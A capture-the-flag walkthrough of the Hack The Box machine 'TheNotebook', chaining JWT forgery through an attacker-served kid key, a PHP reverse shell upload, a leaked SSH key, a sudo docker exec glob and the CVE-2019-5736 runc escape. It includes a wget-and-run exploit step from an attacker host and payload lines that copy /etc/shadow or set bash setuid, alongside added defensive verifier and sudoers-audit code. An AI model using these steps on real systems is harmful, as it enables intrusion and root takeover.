Hackthebox - TheNoteBook

The Notebook

Summary

The Notebook is a medium-difficulty Linux box created by Hackthebox user mostwanted002. The initial foothold was gained by running our own key server and forging the auth (JWT) token, pointing its kid header at a remote key so the token is verified against our key, which gave us admin capabilities. That gave us access to an admin panel with an upload feature, through which we get a reverse shell as www-data. Lateral movement to noah was easy: it came down to finding a backup of the user's home folder, which contained the user's private key, and using it to ssh in as that user. Enumerating the box further we see (ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*, which means we can exec into the container. Enumerating more and googling around docker container escapes, we find that we can do that with CVE-2019-5736, which gets us root on the box.

Initial Enumeration

nmap

# Nmap 7.91 scan initiated Sun Mar  7 09:55:33 2021 as: nmap -sC -sV -oN nmap/thenotebook 10.10.10.230
Nmap scan report for 10.10.10.230
Host is up (0.080s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
| 256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
|_ 256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
10010/tcp filtered rxapi
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 7 09:55:46 2021 -- 1 IP address (1 host up) scanned in 12.89 seconds

We see ports 22 and 80 open (10010 is filtered), so let's start with port 80.

Web

Opening the site we see the initial home page, with register and login links.

Let's register and check the service.

After a successful registration we see a JWT token.

So I placed the token in jwt.io.

Seeing that it has a claim called admin_cap, I thought of forging the token with admin_cap changed,

but that didn't work. In the above token we also see a kid header, so I thought of creating a token signed with a key that is served from an HTTP server we control, and pointing kid at it.

import jwt  # PyJWT

# claims for the forged token; admin_cap is the capability flag seen in the original token
payload = {
    "username": "f3v3r",
    "email": "f3v3r@localhost",
    "admin_cap": 1
}

# key.pem is our own RSA key; the same file is served from our HTTP server
with open("./key.pem", "r") as f:
    key = f.read()

# the kid header points at our HTTP server, so the app fetches our key to check the signature
encoded = jwt.encode(payload, key, algorithm="RS256", headers={"kid": "http://10.10.14.X:8000/key.pem"})

print("encoded", encoded)

Trying that token, and setting it as the cookie value, gets us access to the admin panel.
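The weakness above is that the application treats the kid header as a location to fetch the verification key from, so whoever writes the token also picks the key. The following is an added example (not the box's application code and not the author's) showing a vulnerable key resolver next to a hardened one that only accepts kid as a lookup name into keys the server already holds. To run with no third-party packages it uses HS256 via the stdlib hmac module instead of the RS256 the box used; the resolver logic, not the algorithm, is the point. The "attacker key server" is a constructed in-memory dictionary keyed by the URL from the writeup, so nothing touches the network.

```python
import base64
import hashlib
import hmac
import json

# Added example, not code from the box. HS256 via hmac stands in for the
# RS256 the box used; only the kid-resolution logic matters here.


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def jwt_encode(payload: dict, key: bytes, kid: str) -> str:
    """Build a compact JWS (header.payload.signature) with an HS256 signature."""
    header = {"alg": "HS256", "typ": "JWT", "kid": kid}
    signing_input = (b64url_encode(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url_encode(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


# Server-side key material: the only keys this service ever issued tokens with (constructed).
TRUSTED_KEYS = {"notes-2021-03": b"constructed-server-secret"}

# Constructed stand-in for an attacker-controlled key server (no real HTTP is done).
REMOTE_CONTENT = {"http://10.10.14.X:8000/key.pem": b"attacker-chosen-key"}


def fetch_url(url: str) -> bytes:
    # In the vulnerable app this would be an HTTP GET to whatever the kid header says.
    return REMOTE_CONTENT[url]


def resolve_key_unsafe(kid: str) -> bytes:
    # Vulnerable: kid is treated as a *location*; the token's author controls the key.
    return fetch_url(kid)


def resolve_key_safe(kid: str) -> bytes:
    # Hardened: kid is an opaque name looked up in keys the server already holds.
    if kid not in TRUSTED_KEYS:
        raise ValueError("unknown kid")
    return TRUSTED_KEYS[kid]


def jwt_verify(token: str, resolve_key) -> dict:
    """Verify the signature using the given kid resolver and return the claims."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
    except ValueError:
        raise ValueError("malformed token")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":  # pin the algorithm; never trust the header's choice
        raise ValueError("unexpected alg")
    key = resolve_key(header.get("kid", ""))
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(payload_b64))


def demo() -> dict:
    """Forged token with a remote kid: accepted by the unsafe resolver, rejected by the safe one."""
    forged = jwt_encode({"username": "f3v3r", "admin_cap": 1},
                        b"attacker-chosen-key", "http://10.10.14.X:8000/key.pem")
    legit = jwt_encode({"username": "f3v3r", "admin_cap": 0},
                       TRUSTED_KEYS["notes-2021-03"], "notes-2021-03")
    results = {"forged_unsafe": jwt_verify(forged, resolve_key_unsafe)["admin_cap"]}
    try:
        jwt_verify(forged, resolve_key_safe)
        results["forged_safe"] = "accepted"
    except (ValueError, KeyError):
        results["forged_safe"] = "rejected"
    results["legit_safe"] = jwt_verify(legit, resolve_key_safe)["admin_cap"]
    return results


if __name__ == "__main__":
    print(demo())
```

The safe resolver never dereferences kid; it only indexes a fixed key table, and the algorithm is pinned server-side so the header cannot downgrade it. Both properties are what a verifier should have regardless of whether the keys are HMAC secrets or RSA public keys.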

In the admin panel we see we can upload arbitrary files.

So I uploaded a PHP reverse shell, and opening the link to the uploaded file got me a www-data shell.

Shell (www-data)

Enumerating the box I found home.tar.gz in /var/backups; inside it we find noah's ssh key.

Using that key we can ssh into the box as noah.

Shell (noah)

Enumerating the box further I saw:

$ sudo -l
Matching Defaults entries for noah on thenotebook:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User noah may run the following commands on thenotebook:
(ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*

We know we can run docker exec on the webapp-dev01 container as root without a password. Because the trailing * is a glob, the rule matches any argument list that starts with webapp-dev01, including a shell to run.

So I exec'd into the container using:

sudo /usr/bin/docker exec -it webapp-dev01 bash
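A rule like the one above is worth flagging in any sudoers review: docker exec as root is effectively root on the host, and the trailing glob lets the caller append whatever command they like. The following is an added audit helper (my own example, not the author's or the box's code) that parses sudo -l command lines, mirrors sudo's argument matching (the rule's argument pattern is globbed against the user's arguments joined by spaces, which is why webapp-dev01* also matches "webapp-dev01 bash"), and reports container-runtime binaries and wildcard arguments. The list of runtime binaries and the sample sudo -l text are constructed for the example.

```python
import fnmatch

# Added example, not code from the box. Binaries whose sudo rules amount to host root:
# a root-run `docker exec` starts a root-owned process in a container, and a container
# breakout (such as the runc bug used on this box) turns that into root on the host.
# This set is an assumption for the example; extend it for your environment.
CONTAINER_RUNTIMES = {"/usr/bin/docker", "/usr/bin/podman", "/usr/bin/runc", "/usr/bin/ctr"}


def parse_rule(line: str):
    """Parse one '(runas) TAG: /path args' line as printed by `sudo -l`."""
    line = line.strip()
    if not line.startswith("(") or ")" not in line:
        raise ValueError(f"not a sudo -l command line: {line!r}")
    runas, rest = line[1:].split(")", 1)
    tokens = rest.split()
    tags = set()
    # option tags such as NOPASSWD:, SETENV:, NOEXEC: precede the command
    while tokens and tokens[0].endswith(":") and tokens[0][:-1].isupper():
        tags.add(tokens.pop(0)[:-1])
    if not tokens:
        raise ValueError(f"rule has no command: {line!r}")
    return runas.strip(), tags, tokens[0], tokens[1:]


def rule_matches(rule_args, requested_args) -> bool:
    """Mirror sudo's argument matching: the rule's argument pattern is globbed against
    the user's arguments joined by single spaces, so a trailing * also swallows any
    extra arguments the user appends."""
    return fnmatch.fnmatchcase(" ".join(requested_args), " ".join(rule_args))


def assess_rule(line: str) -> list:
    """Return the findings for one rule (empty list means nothing flagged)."""
    runas, tags, binary, args = parse_rule(line)
    findings = []
    if binary in CONTAINER_RUNTIMES:
        findings.append("container-runtime")
    if any(ch in a for a in args for ch in "*?["):
        findings.append("wildcard-args")
    if findings and "NOPASSWD" in tags:
        findings.append("nopasswd")  # no credential prompt in front of a risky rule
    return findings


def audit(sudo_l_output: str) -> dict:
    """Map each command line of `sudo -l` output to its findings."""
    return {line.strip(): assess_rule(line)
            for line in sudo_l_output.splitlines() if line.strip().startswith("(")}


# Constructed sample, modelled on the sudo -l output above plus two benign rules.
SAMPLE = """
User noah may run the following commands on thenotebook:
    (ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*
    (ALL) NOPASSWD: /usr/bin/systemctl restart nginx
    (root) /usr/bin/docker exec -it webapp-dev01 /bin/sh
"""

if __name__ == "__main__":
    for rule, findings in audit(SAMPLE).items():
        print(findings or ["ok"], rule)
```

The match helper is the part reviewers usually get wrong by eye: a rule that looks like it pins one container name still accepts an arbitrary trailing command once a glob is present, so the fix is either to spell out the full command or to wrap it in a script that takes no arguments.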

In the container I saw a sqlite db containing what looked like a hint:

Backups are scheduled Finally! Regular backups are necessary. Thank god it's all easy on server

But exploring that was a dead end for me.

Going back to the docker escape, I found CVE-2019-5736, a runc vulnerability that lets a process inside the container overwrite the host's runc binary; the overwritten binary then runs as root on the host the next time docker exec is used on that container, which is why the exploit is started inside the container first and triggered by a second docker exec.

sudo /usr/bin/docker exec -it webapp-dev01 sh
cd /tmp/
wget http://10.10.14.X:8000/exploit
chmod +x exploit
./exploit

Then, in a different ssh session, running

sudo /usr/bin/docker exec -it webapp-dev01 sh

triggers the exploit.

To build the exploit, I changed this line of the PoC

var payload = "#!/bin/bash \n cat /etc/shadow > /tmp/shadow && chmod 777 /tmp/shadow"

to

var payload = "#!/bin/bash \n chmod +s /bin/bash"

and built it by running

go build main.go

Using that I got root.

Extra

After getting root I went back over the www-data to noah path and wondered whether there was any hint I could have found to make that part easier. I checked the web-app database and saw that, had we forged the username as admin, we would also have got a few admin notes mentioning that a backup was running.

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/thenotebook/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.